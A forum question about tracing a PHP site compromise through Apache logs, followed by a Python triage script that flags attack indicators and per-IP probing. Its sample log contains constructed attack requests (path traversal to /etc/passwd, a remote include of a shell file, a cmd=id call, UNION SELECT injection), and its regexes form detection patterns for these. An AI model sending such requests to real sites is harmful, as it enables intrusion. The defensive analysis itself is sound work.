How to analyse logs after the site was hacked
- by Vasiliy Toporov
One of our web projects was hacked. The attacker changed some template files in the project and one core file of the web framework (it's one of the well-known PHP frameworks).
We found all the corrupted files using git and reverted them. So now I need to find the weak point.
We can say with high probability that it was not a stolen FTP or SSH password. The hosting provider's support specialist (after analysing the logs) said that it was a security hole in our code.
My questions:
1) What tools should I use to review the Apache access and error logs? (Our server distro is Debian.)
2) Can you give tips on detecting suspicious lines in logs? Maybe tutorials or primers on useful regexps or techniques?
3) How can I separate "normal user behavior" from suspicious behavior in the logs?
4) Is there any way to prevent attacks in Apache?
Thanks for your help.
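An added example for questions 2 and 3, not code from the original post: a small Python triage script that parses Apache "combined" access-log lines, URL-decodes the request, matches it against a handful of common web-attack indicators (traversal, remote file inclusion, command parameters, SQL injection, scanner user agents), and summarises per-client activity so a single IP's burst of 404s or POSTs stands out from ordinary browsing. The log lines, IP addresses and the indicator regexes are constructed for illustration and are a starting point, not a complete signature set; the PHP framework's own template paths are not assumed.

```python
"""Triage an Apache combined access log after a suspected web compromise.

Added example (not from the original post). Sample log lines below are
constructed; the INDICATORS are heuristics to extend for your own application.
"""
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache "combined" LogFormat:
# %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Patterns are matched against the URL-decoded "METHOD path" (or the User-Agent
# for the scanner indicator). Constructed heuristics, not an exhaustive list.
INDICATORS = {
    "path traversal":       re.compile(r"\.\./|\.\.\\|/etc/passwd|/proc/self", re.I),
    "remote/local include": re.compile(r"=(?:https?|ftp|php|data|expect|file)://", re.I),
    "command parameter":    re.compile(r"[?&](?:cmd|exec|command|shell)=", re.I),
    "code injection":       re.compile(r"<\?php|base64_decode|eval\(|system\(|passthru\(|shell_exec\(", re.I),
    "sql injection":        re.compile(r"union\s+(?:all\s+)?select|'\s*or\s+'?\d|sleep\(\d+\)|information_schema", re.I),
    "xss probe":            re.compile(r"<script|javascript:|onerror\s*=", re.I),
    "scanner user-agent":   re.compile(r"sqlmap|nikto|nmap|masscan|python-requests|curl/|wget/", re.I),
}

# Constructed sample: one normal visitor, one attacker probing and including a
# remote file, one automated SQL injection scan. RFC 5737 documentation addresses.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2013:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/19.0"
203.0.113.10 - - [12/Mar/2013:10:01:05 +0000] "GET /css/main.css HTTP/1.1" 200 812 "http://example.org/index.php" "Mozilla/5.0 (X11; Linux x86_64) Firefox/19.0"
198.51.100.7 - - [12/Mar/2013:10:02:11 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1340 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2013:10:02:13 +0000] "GET /index.php?page=http://203.0.113.99/shell.txt HTTP/1.1" 200 2201 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2013:10:02:20 +0000] "POST /templates/default/footer.php?cmd=id HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2013:10:02:25 +0000] "GET /admin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2013:10:02:26 +0000] "GET /phpmyadmin/ HTTP/1.1" 404 209 "-" "Mozilla/5.0"
192.0.2.55 - - [12/Mar/2013:10:03:00 +0000] "GET /search.php?q=%27%20UNION%20SELECT%20user%2Cpassword%20FROM%20users-- HTTP/1.1" 500 0 "-" "sqlmap/1.0-dev"
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    # Decode percent-encoding so that "%2e%2e%2f" and "../" are matched alike.
    entry["decoded"] = unquote(entry["path"])
    return entry


def flag_entry(entry):
    """Return the names of every indicator that matches this request."""
    request = f'{entry["method"]} {entry["decoded"]}'
    hits = []
    for name, pattern in INDICATORS.items():
        target = entry["ua"] if name == "scanner user-agent" else request
        if pattern.search(target):
            hits.append(name)
    return hits


def triage(lines):
    """Return (flagged, per_ip).

    flagged: list of (line_no, ip, indicator names, "METHOD path -> status").
    per_ip:  ip -> Counter of requests / errors (>=400) / posts / flagged lines,
             the per-client view that separates browsing from probing.
    """
    flagged = []
    per_ip = defaultdict(Counter)
    for n, line in enumerate(lines, 1):
        e = parse_line(line)
        if e is None:
            continue  # not combined format (or a truncated line); skip it
        stats = per_ip[e["ip"]]
        stats["requests"] += 1
        if e["status"] >= 400:
            stats["errors"] += 1
        if e["method"] == "POST":
            stats["posts"] += 1
        hits = flag_entry(e)
        if hits:
            stats["flagged"] += 1
            flagged.append((n, e["ip"], hits, f'{e["method"]} {e["path"]} -> {e["status"]}'))
    return flagged, per_ip


def suspicious_ips(per_ip, min_requests=3, error_ratio=0.4):
    """IPs with any flagged request, or a high share of 4xx/5xx responses (file/dir probing)."""
    out = set()
    for ip, s in per_ip.items():
        if s["flagged"]:
            out.add(ip)
        elif s["requests"] >= min_requests and s["errors"] / s["requests"] >= error_ratio:
            out.add(ip)
    return sorted(out)


if __name__ == "__main__":
    flagged, per_ip = triage(SAMPLE_LOG.splitlines())
    for n, ip, hits, req in flagged:
        print(f"line {n:>3} {ip:<15} {', '.join(hits):<40} {req}")
    for ip in suspicious_ips(per_ip):
        print(f"suspicious: {ip} {dict(per_ip[ip])}")
```

Run it against a real file with `triage(open("/var/log/apache2/access.log"))` (the Debian default path); it reads any iterable of lines, so gzip-rotated logs work through `gzip.open(..., "rt")`. The per-IP counters are the part that answers question 3: a normal visitor fetches a page and its assets with a consistent User-Agent and mostly 200s, while a probe produces many 404s in quick succession, POSTs to files that normally only receive GETs, and parameter values that decode to paths or URLs. Narrow the time window to the commit timestamps of the reverted files to find the request that wrote them.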